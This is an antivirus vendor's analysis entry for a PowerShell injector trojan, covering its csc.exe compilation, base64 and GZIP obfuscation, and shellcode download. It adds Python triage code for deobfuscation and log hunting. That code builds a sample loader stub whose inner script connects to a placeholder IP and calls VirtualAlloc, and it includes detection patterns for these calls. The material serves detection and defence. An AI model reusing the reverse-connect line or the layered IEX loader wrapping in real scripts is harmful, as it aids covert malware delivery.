PowerShell/Injector.31B0!tr

Analysis

PowerShell/Injector.31B0!tr is a generic detection for an injector trojan delivered as a PowerShell script. Since this is a generic detection, the samples it covers may vary in behaviour.
Below are some of the observed characteristics/behaviours:

  • This PowerShell script dynamically compiles malicious C# code and loads the resulting assembly into the running PowerShell process. Traces of the compiler-generated code (such as the .cs source and .cmdline response files) may be found in the %Temporary% folder.

  • The following command line is executed to compile the malicious code (the name of the .cmdline response file is generated at random, so it differs between runs):
    • "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%Temporary%\mafetl_3.cmdline"
  • This PowerShell script uses several layers of obfuscation to evade detection. Techniques observed include:
    • Base64 encoding.
    • Base64 encoding combined with GZIP compression.
  • The payload observed for this malware is shellcode that connects to a remote server, such as the following:
    • 89.{removed}.194.236

    Once connected, it allocates virtual memory and requests 0x2000 bytes from the server, which are written to the newly allocated region. These bytes are expected to be a second stage of shellcode, as the trojan then transfers execution to the newly allocated memory.
    The remote server was down at the time of this analysis.
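The indicators above lend themselves to two quick checks: peeling the layered base64/GZIP wrapping off a loader to reach the final-stage script and scan it for the behaviours listed, and hunting process-creation logs for csc.exe spawned by PowerShell with a response file in the temp folder. The Python below is an added example for this entry; it is not Fortinet's code and is not derived from the detected sample. The inner script, the loader stubs and the process-creation events are constructed here for illustration, and the IP 203.0.113.10, the file paths and the user name in them are placeholders.

```python
"""Triage helpers for layered base64/GZIP PowerShell loaders.
Added example for this entry: not Fortinet's code and not taken from the
detected sample. All inputs below are constructed for illustration."""
import base64
import gzip
import re

# Constructed stand-in for a final-stage script. The names mirror the
# behaviours described above: a reverse connection, dynamic C# compilation
# and an executable memory allocation for the downloaded shellcode.
INNER_SCRIPT = (
    "$c = New-Object System.Net.Sockets.TCPClient('203.0.113.10', 4444)\n"
    "Add-Type -TypeDefinition $src\n"
    "[Win32]::VirtualAlloc(0, 0x2000, 0x3000, 0x40)\n"
)

GZIP_MAGIC = b"\x1f\x8b"
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def build_layered_sample(script: str) -> str:
    """Wrap a script the way these loaders do: GZIP, then base64, then a
    plain base64 layer around the resulting decompression stub."""
    inner = base64.b64encode(gzip.compress(script.encode())).decode()
    stub = (
        "$s = New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + inner + "'))\n"
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()\n"
    )
    outer = base64.b64encode(stub.encode()).decode()
    return ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
            + outer + "')))")


def peel_layers(text: str, max_depth: int = 10) -> tuple:
    """Strip base64 wrappers (and GZIP, when the decoded bytes carry the gzip
    magic) until no FromBase64String call is left. Returns the final script
    and the number of layers removed; max_depth bounds runaway nesting."""
    depth = 0
    while depth < max_depth:
        m = B64_CALL.search(text)
        if not m:
            break
        blob = base64.b64decode(m.group(1))
        if blob.startswith(GZIP_MAGIC):
            blob = gzip.decompress(blob)
        text = blob.decode("utf-8", errors="replace")
        depth += 1
    return text, depth


# Static indicators of the behaviours in this entry, checked on the peeled script.
INDICATORS = {
    "dynamic_compile": re.compile(r"Add-Type|CSharpCodeProvider|csc\.exe", re.I),
    "memory_alloc": re.compile(r"VirtualAlloc", re.I),
    "reverse_connect": re.compile(r"TCPClient|Sockets\.Socket|WSAConnect", re.I),
}


def scan_indicators(script: str) -> set:
    """Return the names of the indicators present in a (deobfuscated) script."""
    return {name for name, rx in INDICATORS.items() if rx.search(script)}


# Constructed process-creation events (the fields Sysmon event ID 1 or
# Security 4688 with command-line logging would give you). The first mirrors
# the compile step above; the second is a normal MSBuild-driven compile.
EVENTS = [
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig '
                r'/fullpaths @"C:\Users\user1\AppData\Local\Temp\mafetl_3.cmdline"'},
    {"parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig @"C:\proj\obj\Debug\app.csproj.rsp"'},
]

# A .cmdline response file under a Temp folder is what Add-Type style compilation leaves.
TEMP_CMDLINE = re.compile(r'@"?[^"]*\\Temp\\[^"\\]+\.cmdline"?', re.I)


def csc_spawned_by_powershell(events) -> list:
    """Return command lines of csc.exe processes whose parent is PowerShell
    and whose response file sits in a Temp folder."""
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\csc.exe"):
            continue
        if not e["parent"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
            continue
        if TEMP_CMDLINE.search(e["cmdline"]):
            hits.append(e["cmdline"])
    return hits
```

Add-Type in legitimate administration scripts also spawns csc.exe with a randomly named .cmdline under %TEMP%, so the process-creation match is a hunting lead to pivot from (the parent script, and the .cs source left beside the .cmdline file) rather than a verdict on its own; the indicator scan on the peeled script is what separates a shellcode loader from an admin helper.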

Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

FortiClient                 Extreme
FortiMail                   Extreme
FortiSandbox                Extreme
FortiWeb                    Extreme
Web Application Firewall    Extreme
FortiIsolator               Extreme
FortiDeceptor               Extreme
FortiEDR

Version Updates

Date         Version     Detail
2021-12-28   89.08183
2019-08-13   70.68900    Sig Updated
2019-05-16   68.56300    Sig Updated
2019-05-15   68.54200    Sig Added